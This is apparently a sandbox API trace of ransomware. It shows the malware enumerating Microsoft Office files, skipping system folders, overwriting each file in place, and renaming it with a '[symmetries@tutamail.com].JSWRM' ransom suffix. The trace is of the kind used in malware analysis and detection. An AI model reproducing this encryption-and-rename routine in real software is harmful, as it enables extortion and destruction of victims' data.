lstrcmpiW (lpString1="AWARDHM.POC", lpString2=".") returned 1 [0140.303] lstrcmpiW (lpString1="AWARDHM.POC", lpString2="..") returned 1 [0140.303] lstrcmpiW (lpString1="AWARDHM.POC", lpString2="...") returned 1 [0140.303] lstrcmpiW (lpString1="AWARDHM.POC", lpString2="windows") returned -1 [0140.303] lstrcmpiW (lpString1="AWARDHM.POC", lpString2="recovery") returned -1 [0140.303] lstrcmpiW (lpString1="AWARDHM.POC", lpString2="perflogs") returned -1 [0140.303] lstrcmpiW (lpString1="AWARDHM.POC", lpString2="documents and settings") returned -1 [0140.303] lstrcmpiW (lpString1="AWARDHM.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.303] lstrcmpiW (lpString1="AWARDHM.POC", lpString2="system volume information") returned -1 [0140.303] lstrcmpiW (lpString1="AWARDHM.POC", lpString2="msocache") returned -1 [0140.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AWARDHM.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AWARDHM.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AWARDHM.POC", lpUsedDefaultChar=0x0) returned 11 [0140.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AWARDHM.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AWARDHM.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AWARDHM.POC", lpUsedDefaultChar=0x0) returned 11 [0140.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.304] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\AWARDHM.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\awardhm.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.304] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=41986) returned 1 [0140.304] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.305] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xa400, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xa400, lpOverlapped=0x0) returned 1 [0140.308] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.308] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xa400, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xa400, lpOverlapped=0x0) returned 1 [0140.308] CloseHandle (hObject=0x238) returned 1 [0140.308] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\AWARDHM.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\awardhm.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\AWARDHM.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\awardhm.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.309] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x217f15bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x217f15bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x217f15bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x91cc, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="BAN98.POC", cAlternateFileName="")) returned 1 [0140.309] lstrcmpiW (lpString1="BAN98.POC", lpString2=".") returned 1 [0140.309] lstrcmpiW (lpString1="BAN98.POC", lpString2="..") returned 1 [0140.309] lstrcmpiW (lpString1="BAN98.POC", lpString2="...") returned 1 [0140.309] lstrcmpiW (lpString1="BAN98.POC", lpString2="windows") returned -1 [0140.309] lstrcmpiW (lpString1="BAN98.POC", lpString2="recovery") returned -1 [0140.309] lstrcmpiW (lpString1="BAN98.POC", lpString2="perflogs") returned -1 [0140.309] lstrcmpiW (lpString1="BAN98.POC", lpString2="documents and settings") returned -1 [0140.310] lstrcmpiW (lpString1="BAN98.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.310] lstrcmpiW (lpString1="BAN98.POC", lpString2="system volume information") returned -1 [0140.310] lstrcmpiW (lpString1="BAN98.POC", lpString2="msocache") returned -1 [0140.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BAN98.POC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0140.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BAN98.POC", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BAN98.POC", lpUsedDefaultChar=0x0) returned 9 [0140.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BAN98.POC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0140.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BAN98.POC", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BAN98.POC", lpUsedDefaultChar=0x0) returned 9 [0140.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.310] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BAN98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\ban98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.311] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=37324) returned 1 [0140.311] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.311] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x91c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x91c0, lpOverlapped=0x0) returned 1 [0140.314] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.314] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x91c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x91c0, lpOverlapped=0x0) returned 1 [0140.314] CloseHandle (hObject=0x238) returned 1 [0140.314] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BAN98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\ban98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BAN98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\ban98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.316] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x217f15bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x217f15bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x218177f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd2e3, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="BANNER.DPV", cAlternateFileName="")) returned 1 [0140.316] lstrcmpiW (lpString1="BANNER.DPV", lpString2=".") returned 1 [0140.316] lstrcmpiW (lpString1="BANNER.DPV", lpString2="..") returned 1 [0140.316] lstrcmpiW (lpString1="BANNER.DPV", lpString2="...") returned 1 [0140.316] lstrcmpiW (lpString1="BANNER.DPV", lpString2="windows") returned -1 [0140.316] lstrcmpiW (lpString1="BANNER.DPV", lpString2="recovery") returned -1 [0140.316] lstrcmpiW (lpString1="BANNER.DPV", lpString2="perflogs") returned -1 [0140.316] lstrcmpiW (lpString1="BANNER.DPV", lpString2="documents and settings") returned -1 [0140.316] lstrcmpiW (lpString1="BANNER.DPV", lpString2="$RECYCLE.BIN") returned 1 [0140.316] lstrcmpiW (lpString1="BANNER.DPV", lpString2="system volume information") returned -1 [0140.316] lstrcmpiW (lpString1="BANNER.DPV", lpString2="msocache") returned -1 [0140.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BANNER.DPV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BANNER.DPV", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BANNER.DPV", lpUsedDefaultChar=0x0) returned 10 [0140.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BANNER.DPV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BANNER.DPV", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BANNER.DPV", lpUsedDefaultChar=0x0) returned 10 [0140.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.317] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BANNER.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\banner.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.318] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=53987) returned 1 [0140.318] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.318] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xd2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xd2e0, lpOverlapped=0x0) returned 1 [0140.433] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.433] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xd2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xd2e0, lpOverlapped=0x0) returned 1 [0140.434] CloseHandle (hObject=0x238) returned 1 [0140.434] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BANNER.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\banner.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BANNER.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\banner.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.436] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2183da4c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2183da4c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2183da4c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x236c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="BANNER.XML", cAlternateFileName="")) returned 1 [0140.436] lstrcmpiW (lpString1="BANNER.XML", lpString2=".") returned 1 [0140.436] lstrcmpiW (lpString1="BANNER.XML", lpString2="..") returned 1 [0140.436] lstrcmpiW (lpString1="BANNER.XML", lpString2="...") returned 1 [0140.436] lstrcmpiW (lpString1="BANNER.XML", lpString2="windows") returned -1 [0140.436] lstrcmpiW (lpString1="BANNER.XML", lpString2="recovery") returned -1 [0140.436] lstrcmpiW (lpString1="BANNER.XML", lpString2="perflogs") returned -1 [0140.436] lstrcmpiW (lpString1="BANNER.XML", lpString2="documents and settings") returned -1 [0140.436] lstrcmpiW (lpString1="BANNER.XML", lpString2="$RECYCLE.BIN") returned 1 [0140.437] lstrcmpiW (lpString1="BANNER.XML", lpString2="system volume information") returned -1 [0140.437] lstrcmpiW (lpString1="BANNER.XML", lpString2="msocache") returned -1 [0140.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BANNER.XML", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BANNER.XML", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BANNER.XML", lpUsedDefaultChar=0x0) returned 10 [0140.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BANNER.XML", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BANNER.XML", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BANNER.XML", lpUsedDefaultChar=0x0) returned 10 [0140.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.437] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BANNER.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\banner.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.438] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9068) returned 1 [0140.438] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.438] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2360, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2360, lpOverlapped=0x0) returned 1 [0140.442] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.442] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2360, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2360, lpOverlapped=0x0) returned 1 [0140.442] CloseHandle (hObject=0x238) returned 1 [0140.442] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BANNER.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\banner.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BANNER.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\banner.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.443] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21863ca8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21863ca8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21863ca8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4d90, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="BDRTKFUL.POC", cAlternateFileName="")) returned 1 [0140.443] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2=".") returned 1 [0140.443] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2="..") returned 1 [0140.443] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2="...") returned 1 [0140.443] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2="windows") returned -1 [0140.443] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2="recovery") returned -1 [0140.443] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2="perflogs") returned -1 [0140.443] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2="documents and settings") returned -1 [0140.443] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.443] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2="system volume information") returned -1 [0140.443] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2="msocache") returned -1 [0140.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BDRTKFUL.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BDRTKFUL.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BDRTKFUL.POC", lpUsedDefaultChar=0x0) returned 12 [0140.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BDRTKFUL.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BDRTKFUL.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BDRTKFUL.POC", lpUsedDefaultChar=0x0) returned 12 [0140.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.444] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BDRTKFUL.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bdrtkful.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.445] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19856) returned 1 [0140.445] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.446] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4d90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x4d90, lpOverlapped=0x0) returned 1 [0140.448] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.448] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4d90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x4d90, lpOverlapped=0x0) returned 1 [0140.448] CloseHandle (hObject=0x238) returned 1 [0140.448] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BDRTKFUL.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bdrtkful.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BDRTKFUL.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bdrtkful.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.449] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2183da4c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2183da4c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2183da4c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3f40c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="BIZCARD.DPV", cAlternateFileName="")) returned 1 [0140.449] lstrcmpiW (lpString1="BIZCARD.DPV", lpString2=".") returned 1 [0140.449] lstrcmpiW (lpString1="BIZCARD.DPV", lpString2="..") returned 1 [0140.449] lstrcmpiW (lpString1="BIZCARD.DPV", lpString2="...") returned 1 [0140.450] lstrcmpiW (lpString1="BIZCARD.DPV", lpString2="windows") returned -1 [0140.450] lstrcmpiW (lpString1="BIZCARD.DPV", lpString2="recovery") returned -1 [0140.450] lstrcmpiW (lpString1="BIZCARD.DPV", lpString2="perflogs") returned -1 [0140.450] lstrcmpiW (lpString1="BIZCARD.DPV", lpString2="documents and settings") returned -1 [0140.450] lstrcmpiW (lpString1="BIZCARD.DPV", lpString2="$RECYCLE.BIN") returned 1 [0140.450] lstrcmpiW (lpString1="BIZCARD.DPV", lpString2="system volume information") returned -1 [0140.450] lstrcmpiW (lpString1="BIZCARD.DPV", lpString2="msocache") returned -1 [0140.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BIZCARD.DPV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BIZCARD.DPV", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BIZCARD.DPV", lpUsedDefaultChar=0x0) returned 11 [0140.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BIZCARD.DPV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BIZCARD.DPV", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BIZCARD.DPV", lpUsedDefaultChar=0x0) returned 11 [0140.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, 